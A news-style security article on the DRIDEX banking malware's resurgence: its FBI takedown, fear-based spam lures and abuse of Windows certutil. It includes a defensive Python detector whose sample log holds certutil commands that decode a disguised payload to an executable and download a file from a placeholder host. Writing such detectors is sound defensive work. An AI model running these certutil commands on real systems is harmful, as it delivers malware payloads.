
If there's one thing that you can count on coming back, it's DRIDEX.
This piece of malicious code has a history of being particularly resilient. Over the past couple of years, it has surfaced and made a name for itself as the successor to the Gameover Zeus malware, according to Trend Micro. DRIDEX, a banking malware that leverages programs within Microsoft Office to infect financial systems, is unusual because it operates under a Botnet-as-a-Service business model, using multiple servers to create several bot networks, each with its own list of target banks.
Higher powers-that-be are even getting into the fray with DRIDEX. In October, Trend Micro reported that the FBI had partnered with various security vendors to orchestrate a takedown of the malware and its perpetrators, leading to the seizure of multiple servers being used by DRIDEX to infiltrate systems and steal information.
So far, the malware has been behind a string of successful attacks against banking institutions. CNBC reported that Andrey Ghinkul, a 30-year-old hacker from Moldova, was arrested by the FBI in October in connection with a total of $30.7 million stolen using this malicious program. This is how extensively DRIDEX has been able to impact companies on a global scale – so much so that the FBI and the U.K.'s National Crime Agency have been called in to eradicate it.
DRIDEX is back at it again
Despite the dramatic takedown of the malware and the subsequent charges filed against its administrators, it seems that what is dead may never actually die. In the months since the FBI takedown, the malware has been relatively quiet. But recently, Trend Micro researchers reported that DRIDEX has exhibited a spike in spam email activity in the U.S., Brazil, China, Germany and Japan. The U.S. was the target of most of these email attacks, at nearly 60 percent.
Usually, these kinds of spam emails include fake invoices requesting that users divulge banking information. It seems that this time around, the perpetrators of DRIDEX have a different strategy up their sleeves.
"There are significant differences from this particular DRIDEX campaign as opposed to its previous waves," Trend Micro researchers wrote. "Instead of the usual fake invoice or notification baits, DRIDEX plays on people's fears of having their accounts compromised."
The emails usually carry language designed to alarm the recipient, with subject lines like "Account Compromised." This kind of attack, which works better on some people than on others, uses fear to get users to open the email and click on whatever link it contains. Even worse, this campaign abuses the Windows command-line program certutil, which allows the DRIDEX payload to pass itself off as a legitimate certificate. In other words, to unwary eyes, the email and its attachment will look real.
The program, therefore, is banking on you opening the email attachment, which supposedly contains the full report on how your account information was accessed. This, of course, is the beginning of the malware's infiltration.
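Because certutil is a signed Windows binary, a defender cannot simply block it; the useful signal is how it is invoked and by whom. The script below is an added example (it is not code from this article or from Trend Micro) that scores process-creation events for the pattern described above: certutil launched by an Office application, using its real payload-handling switches (-decode, -decodehex, -urlcache), and writing a file with an executable extension. The pipe-delimited log format, the sample events, user names and paths are all constructed for the example.

```python
"""Flag suspicious certutil.exe invocations in process-creation events.

Added detection example, not from the original article. Assumes a constructed
log format: timestamp|parent_image|image|command_line (one event per line).
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass, field

# Office applications that a lure document is opened in. certutil being spawned
# by one of these is far more suspicious than an admin running it from a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Real certutil switches: -decode/-decodehex turn a base64 or hex "certificate"
# text file back into raw bytes, -urlcache fetches a URL to disk. All are
# legitimate, but they are how a payload disguised as a certificate becomes a binary.
PAYLOAD_SWITCHES = {"decode", "decodehex", "urlcache"}

EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".bat", ".vbs", ".js", ".ps1"}

# Constructed sample events (timestamps, hosts and paths are made up).
SAMPLE_LOG = r"""
2016-04-05T10:12:01Z|services.exe|C:\Windows\System32\certutil.exe|certutil -verify C:\certs\vendor.cer
2016-04-05T10:13:44Z|winword.exe|C:\Windows\System32\certutil.exe|certutil -decode C:\Users\bob\AppData\Local\Temp\report.cer C:\Users\bob\AppData\Local\Temp\report.exe
2016-04-05T10:14:02Z|explorer.exe|C:\Windows\System32\certutil.exe|certutil /urlcache /split /f http://example.invalid/update.bin C:\Users\bob\x.bin
2016-04-05T10:15:30Z|explorer.exe|C:\Windows\System32\notepad.exe|notepad readme.txt
"""


@dataclass
class Event:
    timestamp: str
    parent_image: str
    image: str
    command_line: str
    reasons: list[str] = field(default_factory=list)


def parse_event(line: str) -> Event:
    """Split one pipe-delimited log line into an Event."""
    ts, parent, image, cmd = line.rstrip("\n").split("|", 3)
    return Event(ts, parent, image, cmd)


def assess(ev: Event) -> list[str]:
    """Return human-readable reasons the event looks like certutil abuse."""
    if ntpath.basename(ev.image).lower() != "certutil.exe":
        return []
    tokens = ev.command_line.split()
    # certutil accepts both '-' and '/' as switch prefixes.
    is_switch = lambda t: t.startswith(("-", "/"))
    switches = {t.lstrip("-/").lower() for t in tokens if is_switch(t)}
    args = [t for t in tokens[1:] if not is_switch(t)]

    reasons: list[str] = []
    used = switches & PAYLOAD_SWITCHES
    if used:
        reasons.append("payload-handling switch: " + ", ".join(sorted(used)))
    if ntpath.basename(ev.parent_image).lower() in OFFICE_PARENTS:
        reasons.append("spawned by Office application " + ev.parent_image)
    # For -decode and -urlcache the output file is the last positional argument.
    if used and args:
        ext = ntpath.splitext(args[-1])[1].lower()
        if ext in EXECUTABLE_EXTS:
            reasons.append(f"writes an executable file ({ext})")
    return reasons


def scan_log(text: str) -> list[Event]:
    """Parse every non-empty line and return only the flagged events."""
    flagged = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        ev.reasons = assess(ev)
        if ev.reasons:
            flagged.append(ev)
    return flagged


if __name__ == "__main__":
    for ev in scan_log(SAMPLE_LOG):
        print(ev.timestamp, ev.parent_image, "->", ev.command_line)
        for reason in ev.reasons:
            print("    -", reason)
```

On the sample log the benign `-verify` run and the notepad event produce no reasons, the Office-spawned `-decode` event accumulates three, and the `/urlcache` download one. In production the same three checks map cleanly onto Sysmon Event ID 1 or Windows Security event 4688 fields (parent image, image, command line), and the reason count gives a simple severity to sort alerts by.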
Look out for more DRIDEX in the future
This isn't the only recent resurgence of the DRIDEX malware. At the beginning of April 2016, Dark Reading contributor Jai Vijayan reported that it was being used to steal payment card data by different actors than it had been in the past.
"The manner in which DRIDEX is currently being used also is consistent with the manner in which other major cyber groups have evolved their strategies," Vijayan wrote, paraphrasing buguroo CTO and co-founder Pablo de la Riva Ferrezuelo. "After initially using the malware themselves, such groups have tended to sell it for use to other groups and eventually the code leaks to the broader underground community."
What does this mean? There's no shortage of hackers looking to exploit your banking information for their own nefarious purposes, and if the code for DRIDEX is still lurking, you can bet these malicious actors will be using it – no matter whether men like Ghinkul are behind bars or not.
How to combat banking malware
Using malicious code to infiltrate systems and steal banking data is one of the most popular ways for hackers to gain access to confidential financial information, as the DRIDEX malware demonstrates. Banking malware has been used in the past to steal millions of dollars from financial services organizations.
When old strains of malware become a new threat, it's crucial to make sure your computer systems are protected. In addition, it's best practice to avoid clicking on links in emails that come from unknown senders. To keep systems safe, cyber security products that track the reputation of web domains will be the most useful, along with file reputation checking. The bottom line is: Don't be fooled by DRIDEX email scams, and invest in cyber security solutions that can minimize the impact of these targeted attacks.